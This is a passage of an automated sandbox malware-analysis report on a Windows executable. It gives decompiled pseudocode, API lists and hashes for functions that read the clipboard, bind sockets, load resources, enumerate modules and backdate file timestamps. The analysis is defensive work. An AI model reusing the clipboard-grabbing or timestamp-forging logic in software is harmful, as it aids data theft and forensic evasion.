					if(OpenClipboard(_a4) != 0) {
						if(0 == 0) {
							_push(1);
						} else {
							_push(0xd);
						}
						_t12 = GetClipboardData();
						_a4 = _t12;
						if(_t12 != 0) {
							_t24 = GlobalLock(_t12);
							if(_t24 != 0) {
								_push(_t24);
								if(0 == 0) {
									L0043DDD2();
								} else {
									_t17 = lstrlenW();
									_t3 =  &(_t17[1]); // 0x1
									_t34 = _t3;
									_push(_t34);
									L0043DD54();
									_t31 = _t17;
									WideCharToMultiByte(0, 0, _t24, 0xffffffff, _t31, _t34, 0, 0);
									_push(_t31);
									L0043DDD2();
									_push(_t31);
									L0043DD42();
								}
								GlobalUnlock(_a4);
							}
						}
						CloseClipboard();
						return 1;
					}
					goto L11;
				} else {
					L11:
					return 0;
				}
			}

0x00428e19
0x00428e24
0x00428e31
0x00428e33
0x00428e33
0x00428e44
0x00428e4a
0x00428e4c
0x00428e4c
0x00428e57
0x00428e68
0x00428e70
0x00428e76
0x00428e72
0x00428e72
0x00428e72
0x00428e78
0x00428e80
0x00428e84
0x00428e8d
0x00428e91
0x00428e95
0x00428e96
0x00428ed0
0x00428e98
0x00428e98
0x00428e9e
0x00428e9e
0x00428ea1
0x00428ea2
0x00428ea7
0x00428eb5
0x00428ebe
0x00428ebf
0x00428ec4
0x00428ec5
0x00428eca
0x00428ed8
0x00428ed8
0x00428e91
0x00428ede
0x00000000
0x00428ee6
0x00000000
0x00428e6a
0x00428e6a
0x00000000
0x00428e6a

APIs

Part of subcall function 00428BC9: GetCurrentThreadId.KERNEL32 ref: 00428BCE
Part of subcall function 00428BC9: GetForegroundWindow.USER32(00000000,?,?,?,00428E19), ref: 00428BD7
Part of subcall function 00428BC9: GetWindowThreadProcessId.USER32(00000000), ref: 00428BDE
Part of subcall function 00428BC9: AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,00428E19), ref: 00428BF5
Part of subcall function 00428BC9: GetFocus.USER32 ref: 00428BF7
Part of subcall function 00428BC9: AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,00428E19), ref: 00428C03

IsWindow.USER32(00000000), ref: 00428E1C
IsWindowUnicode.USER32(00000000), ref: 00428E27
IsClipboardFormatAvailable.USER32(0000000D), ref: 00428E40
IsClipboardFormatAvailable.USER32(00000001), ref: 00428E53
OpenClipboard.USER32(?), ref: 00428E60
GetClipboardData.USER32 ref: 00428E78
GlobalLock.KERNEL32 ref: 00428E87
lstrlenW.KERNEL32(00000000), ref: 00428E98
#823.MFC42(00000001), ref: 00428EA2
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 00428EB5
#860.MFC42(00000000), ref: 00428EBF
#825.MFC42(00000000,00000000), ref: 00428EC5
#860.MFC42(00000000), ref: 00428ED0
GlobalUnlock.KERNEL32(?,00000000), ref: 00428ED8
CloseClipboard.USER32 ref: 00428EDE

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Clipboard$ThreadWindow$#860AttachAvailableFormatGlobalInput$#823#825ByteCharCloseCurrentDataFocusForegroundLockMultiOpenProcessUnicodeUnlockWidelstrlen
String ID:
API String ID: 1897166774-0
Opcode ID: 2a9c37f9990bcf284fc50f5a0cfb25a6d21807d16c55cf989611d3b0ce5baa3f
Instruction ID: 32ece6f881f232434e16bac1997306dc82d512f00043ff804f33f92d6b9bc378
Opcode Fuzzy Hash: 2a9c37f9990bcf284fc50f5a0cfb25a6d21807d16c55cf989611d3b0ce5baa3f
Instruction Fuzzy Hash: 7021F73A301225ABEB102B71BC08B7F3A5CAFD1B91F52402FF909D6250DF288D02966D

Uniqueness

Uniqueness Score: -1.00%

Function 00410C1A, Relevance: 16.6, APIs: 11, Instructions: 79
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00410C1A(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12) {
				intOrPtr* _v8;
				void* _v20;
				void* _v22;
				void _v24;
				void* _v36;
				void* _v38;
				void _v40;
				void* _t23;
				void* _t32;
				intOrPtr* _t34;
				char* _t41;
				void* _t42;

				_t41 = _a12;
				_v8 = __ecx;
				if(_t41 == 0 || strlen(_t41) == 0) {
					L6:
					_t23 = memset( &_v40, 0, 0x10);
					_v40 = 2;
					_push(_a8);
					L0043E9AC();
					_push(_a4);
					_v38 = _t23;
					L0043E9A6();
					_v36 = _t23;
					if(_t23 != 0xffffffff) {
						L9:
						return E00410CF7( &_v40, _v8,  &_v40, 0x10);
					}
					_push(_a4);
					L0043E9A0();
					if(_t23 == 0) {
						goto L11;
					}
					_v36 =  *( *( *(_t23 + 0xc)));
					goto L9;
				} else {
					_t32 = memset( &_v24, 0, 0x10);
					_t42 = _t42 + 0xc;
					_v24 = 2;
					_push(0);
					L0043E9AC();
					_push(_t41);
					_v22 = _t32;
					L0043E9A6();
					_v20 = _t32;
					if(_t32 != 0xffffffff) {
						L5:
						_push(0x10);
						_push( &_v24);
						_t34 = _v8;
						_push( *_t34);
						L0043E99A();
						if(_t34 == 0xffffffff) {
							L12:
							return 0;
						}
						goto L6;
					}
					_push(_t41);
					L0043E9A0();
					if(_t32 == 0) {
						L11:
						_push(0x2726);
						L0043E994();
						goto L12;
					}
					_v20 =  *( *( *(_t32 + 0xc)));
					goto L5;
				}
			}

0x00410c21
0x00410c26
0x00410c29
0x00410c8e
0x00410c96
0x00410c9e
0x00410ca4
0x00410ca7
0x00410cac
0x00410caf
0x00410cb3
0x00410cbb
0x00410cbe
0x00410cd6
0x00000000
0x00410cdf
0x00410cc0
0x00410cc3
0x00410cca
0x00000000
0x00000000
0x00410cd3
0x00000000
0x00410c36
0x00410c3e
0x00410c43
0x00410c46
0x00410c4c
0x00410c4e
0x00410c53
0x00410c54
0x00410c58
0x00410c60
0x00410c63
0x00410c79
0x00410c7c
0x00410c7e
0x00410c7f
0x00410c82
0x00410c84
0x00410c8c
0x00410cf3
0x00000000
0x00410cf3
0x00000000
0x00410c8c
0x00410c65
0x00410c66
0x00410c6d
0x00410ce9
0x00410ce9
0x00410cee
0x00000000
0x00410cee
0x00410c76
0x00000000
0x00410c76

APIs

strlen.MSVCRT ref: 00410C2C
memset.MSVCRT ref: 00410C3E
htons.WSOCK32(00000000), ref: 00410C4E
inet_addr.WSOCK32(?,00000000), ref: 00410C58
gethostbyname.WSOCK32(?,?,00000000), ref: 00410C66
bind.WSOCK32(?,00000002,00000010,?,00000000), ref: 00410C84
memset.MSVCRT ref: 00410C96
htons.WSOCK32(?), ref: 00410CA7
inet_addr.WSOCK32(?,?), ref: 00410CB3
gethostbyname.WSOCK32(?,?,?), ref: 00410CC3
WSASetLastError.WSOCK32(00002726,?,?,?), ref: 00410CEE

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: gethostbynamehtonsinet_addrmemset$ErrorLastbindstrlen
String ID:
API String ID: 4090841652-0
Opcode ID: c16a6b6c7e94edf565e58efe511fdaa5b478281006da1fd80f848fead1eddec9
Instruction ID: d674f91600aa8ab3bb4dbee49d66a0df3480c9fadf0066817bb9090540f486b9
Opcode Fuzzy Hash: c16a6b6c7e94edf565e58efe511fdaa5b478281006da1fd80f848fead1eddec9
Instruction Fuzzy Hash: 9D216271901209AACF10EBA6C942FCE77B8AF0C314F101617F510B72D1E7B99A809B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0042980F, Relevance: 12.0, APIs: 8, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0042980F(void* __eax, void* __ecx, intOrPtr _a4, CHAR* _a8, CHAR* _a12) {
				signed int _v8;
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				long _t23;
				struct HRSRC__* _t25;

				_v8 = _v8 & 0x00000000;
				L0043E1C2();
				_t12 = FindResourceA( *(__eax + 0xc), _a8, _a12);
				_t25 = _t12;
				if(_t25 == 0) {
					L3:
					_push(0x4550cc);
					L0043DE26();
				} else {
					L0043E1C2();
					_t23 = SizeofResource( *(_t12 + 0xc), _t25);
					_t16 = LoadResource(0, _t25);
					if(_t16 == 0) {
						goto L3;
					} else {
						_t17 = LockResource(_t16);
						if(_t17 != 0) {
							_push(_t23);
							_push(_t17);
							L0043DFDC();
						} else {
							goto L3;
						}
					}
				}
				return _a4;
			}

0x00429813
0x00429819
0x00429828
0x0042982e
0x00429832
0x0042985e
0x00429861
0x00429866
0x00429834
0x00429834
0x00429847
0x00429849
0x00429851
0x00000000
0x00429853
0x00429854
0x0042985c
0x00429870
0x00429871
0x00429872
0x00000000
0x00000000
0x00000000
0x0042985c
0x00429851
0x0042987d

APIs

#1168.MFC42(?,00000001), ref: 00429819
FindResourceA.KERNEL32(?,?,?), ref: 00429828
#1168.MFC42(?,00000001), ref: 00429834
SizeofResource.KERNEL32(?,00000000,?,00000001), ref: 0042983E
LoadResource.KERNEL32(00000000,00000000,?,00000001), ref: 00429849
LockResource.KERNEL32(00000000,?,00000001), ref: 00429854
#537.MFC42(004550CC,?,00000001), ref: 00429866
#538.MFC42(00000000,00000000,?,00000001), ref: 00429872

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Resource$#1168$#537#538FindLoadLockSizeof
String ID:
API String ID: 2191530475-0
Opcode ID: 5faf863e81717e394f3e27d810a4122f1be5160660122d9ef750295ed4b72949
Instruction ID: 059b2ac92e7b24fafd183805c8d9a7b47e0142f6e056c82b0b0b482a52c4bd2c
Opcode Fuzzy Hash: 5faf863e81717e394f3e27d810a4122f1be5160660122d9ef750295ed4b72949
Instruction Fuzzy Hash: 98F0863A601214BBCB106FA3EC4DF9B7B6CEF467A5F048019F905CB251DA38C900C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 0042AAFA, Relevance: 7.6, APIs: 5, Instructions: 53
timefileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E0042AAFA(CHAR* _a4) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* _t28;

				_t28 = CreateFileA(_a4, 0x10000000, 1, 0, 3, 0, 0);
				if(_t28 != 0xffffffff) {
					GetSystemTime( &_v28);
					_v28.wYear = _v28.wYear - 1;
					if(_v28.wHour > 5) {
						_v28.wHour = _v28.wHour + 0xfffc;
					}
					if(_v28.wMinute > 0x14) {
						_v28.wMinute = _v28.wMinute + 0xfff7;
					}
					SystemTimeToFileTime( &_v28,  &_v12);
					if(SetFileTime(_t28,  &_v12,  &_v12,  &_v12) != 0) {
						_push(1);
						_pop(0);
					}
					CloseHandle(_t28);
					return 0;
				}
				return 0;
			}

0x0042ab19
0x0042ab1e
0x0042ab28
0x0042ab2e
0x0042ab37
0x0042ab39
0x0042ab39
0x0042ab44
0x0042ab46
0x0042ab46
0x0042ab54
0x0042ab6f
0x0042ab71
0x0042ab73
0x0042ab73
0x0042ab75
0x00000000
0x0042ab7b
0x00000000

APIs

CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000000,00000000,00000000,00001070), ref: 0042AB13
GetSystemTime.KERNEL32(?), ref: 0042AB28
SystemTimeToFileTime.KERNEL32(00000000,?), ref: 0042AB54
SetFileTime.KERNEL32(00000000,?,?,?), ref: 0042AB67
CloseHandle.KERNEL32(00000000), ref: 0042AB75

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Time$File$System$CloseCreateHandle
String ID:
API String ID: 1892540690-0
Opcode ID: 3e37a9bb9061778724ab25907283ce794bef5600a796ee6e272bf4e3989e98c9
Instruction ID: e42c86faabdeba8bec7fce4635c4ec8d5a137612088af684c8b1283a054b23dc
Opcode Fuzzy Hash: 3e37a9bb9061778724ab25907283ce794bef5600a796ee6e272bf4e3989e98c9
Instruction Fuzzy Hash: 25018436A00129B7CB20ABA0DC4DEDFBF7CEB41761F400162FB01E2080E7749685C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 004288B3, Relevance: 7.5, APIs: 5, Instructions: 49
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004288B3(int _a4, intOrPtr _a8, void* _a12, int _a16) {
				void _v548;
				void* _v552;
				int _t17;
				void* _t29;

				_v552 = 0;
				memset( &_v548, 0, 0x88 << 2);
				_t29 = CreateToolhelp32Snapshot(8, _a4);
				if(_t29 != 0xffffffff) {
					_v552 = 0x224;
					_t17 = Module32First(_t29,  &_v552);
					while(_t17 != 0) {
						if(_v548 == _a8) {
							memcpy(_a12,  &_v552, _a16);
							_push(1);
							_pop(0);
							break;
						}
						_t17 = Module32Next(_t29,  &_v552);
					}
					CloseHandle(_t29);
					return 0;
				}
				return 0;
			}

0x004288d0
0x004288d6
0x004288e0
0x004288e5
0x004288f1
0x004288fd
0x00428903
0x00428910
0x0042892f
0x00428937
0x00428939
0x00000000
0x00428939
0x0042891a
0x0042891a
0x0042893b
0x00000000
0x00428941
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000224), ref: 004288DA
Module32First.KERNEL32(00000000,?), ref: 004288FD
Module32Next.KERNEL32(00000000,00000224), ref: 0042891A
memcpy.MSVCRT ref: 0042892F
CloseHandle.KERNEL32(00000000), ref: 0042893B

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Module32$CloseCreateFirstHandleNextSnapshotToolhelp32memcpy
String ID:
API String ID: 3396000673-0
Opcode ID: ccd5b3b30292cc2de737778afcc7d41322d5855fe16f49476cfa2f31b7b46167
Instruction ID: d21a99a5ffdc76937643075f2ed3e98fd1b08ba3fdbff1b90f4877e4612385a0
Opcode Fuzzy Hash: ccd5b3b30292cc2de737778afcc7d41322d5855fe16f49476cfa2f31b7b46167
Instruction Fuzzy Hash: C0019671601129BBDB106FA4FC4CABE77F8EB48710F400065F909E2291DB34EA959F55

Uniqueness

Uniqueness Score: -1.00%

Function 0041C947, Relevance: 6.0, APIs: 4, Instructions: 22
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C947(void* __ecx, CHAR* _a4) {
				char _v8;

				FormatMessageA(0x1300, 0, GetLastError(), 0x400,  &_v8, 0, 0);
				MessageBoxA(0, _v8, _a4, 0x40);
				return LocalFree(_v8);
			}

0x0041c966
0x0041c976
0x0041c986

APIs

GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,0041C928,00000000), ref: 0041C958
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,0041C928,00000000), ref: 0041C966
MessageBoxA.USER32 ref: 0041C976
LocalFree.KERNEL32(?,?,?,0041C928,00000000), ref: 0041C97F

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Message$ErrorFormatFreeLastLocal
String ID:
API String ID: 2195691534-0
Opcode ID: 69da815af059d81913db80da737ee17f326d5dc990677a361b694f9848ca6dc9
Instruction ID: 3bc4f8c01b02efb8082ddc7d6f78757f0c1be26b83f70456bb872165f8272f4e
Opcode Fuzzy Hash: 69da815af059d81913db80da737ee17f326d5dc990677a361b694f9848ca6dc9
Instruction Fuzzy Hash: 7AE0BF79244248FFF7019BD0DD0FF9D7A69EB55B46F144020F705A80E0D6B15A509B69

Uniqueness

Uniqueness Score: -1.00%

Function 00429112, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
comCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00429112() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr* _t32;
				intOrPtr* _t35;
				intOrPtr* _t36;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr* _t55;

				_v8 = 0;
				__imp__CoCreateInstance(0x44a5a4, 0, 1, 0x44a5c4,  &_v8);
				_t32 = _v8;
				if(_t32 == 0) {
					L12:
					return 0;
				}
				_v12 = 0;
				 *((intOrPtr*)( *_t32))(_t32, 0x44a5f4,  &_v12);
				_t35 = _v12;
				if(_t35 != 0) {
					 *((intOrPtr*)( *_t35 + 0x20))(_t35);
					_t39 = _v12;
					 *((intOrPtr*)( *_t39 + 8))(_t39);
					_t41 = _v8;
					 *((intOrPtr*)( *_t41))(_t41, 0x44a594, 0x455b50);
					_t43 =  *0x455b50; // 0x0
					if(_t43 != 0) {
						_v16 = 0;
						_v20 = 0;
						_v24 = 0;
						 *((intOrPtr*)( *_t43 + 0xc))(_t43,  &_v20);
						_t45 =  *0x455b50; // 0x0
						 *((intOrPtr*)( *_t45 + 0xc))(_t45,  &_v24);
						_t47 =  *0x455b50; // 0x0
						 *((intOrPtr*)( *_t47 + 0x34))(_t47, "<HTML><BODY></BODY></HTML>", 0,  &_v16, _v20, _v24);
						_t49 = _v16;
						if(_t49 != 0) {
							_push(0x455b54);
							_push(0x44a5d4);
							_push(_t49);
							if( *((intOrPtr*)( *_t49))() >= 0) {
								_push(1);
								_pop(0);
							}
							_t55 = _v16;
							 *((intOrPtr*)( *_t55 + 8))(_t55);
						}
						_t50 = _v20;
						if(_t50 != 0) {
							 *((intOrPtr*)( *_t50 + 8))(_t50);
						}
						_t51 = _v24;
						if(_t51 != 0) {
							 *((intOrPtr*)( *_t51 + 8))(_t51);
						}
					}
				}
				_t36 = _v8;
				 *((intOrPtr*)( *_t36 + 8))(_t36);
				goto L12;
			}

0x0042912d
0x00429132
0x00429138
0x0042913d
0x0042920f
0x00429214
0x00429214
0x00429146
0x00429152
0x00429154
0x00429159
0x00429162
0x00429165
0x0042916b
0x0042916e
0x0042917e
0x00429180
0x00429187
0x0042918c
0x0042918f
0x00429192
0x00429199
0x0042919c
0x004291a8
0x004291ae
0x004291c3
0x004291c6
0x004291cb
0x004291cf
0x004291d4
0x004291d9
0x004291de
0x004291e0
0x004291e2
0x004291e2
0x004291e3
0x004291e9
0x004291e9
0x004291ec
0x004291f1
0x004291f6
0x004291f6
0x004291f9
0x004291fe
0x00429203
0x00429203
0x004291fe
0x00429187
0x00429206
0x0042920c
0x00000000

APIs

CoCreateInstance.OLE32(0044A5A4,00000000,00000001,0044A5C4,?,?,00000001), ref: 00429132

Strings

<HTML><BODY></BODY></HTML>, xrefs: 004291BD

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CreateInstance
String ID: <HTML><BODY></BODY></HTML>
API String ID: 542301482-2947607053
Opcode ID: 4a9925b03b930334a82968031de3dd0dcf6269f4a2537a7965451cac0e189c7a
Instruction ID: ba9b02bb7d2e38caffa9f8ebe84850444a106016ecc5461326b55a32d07d4db6
Opcode Fuzzy Hash: 4a9925b03b930334a82968031de3dd0dcf6269f4a2537a7965451cac0e189c7a
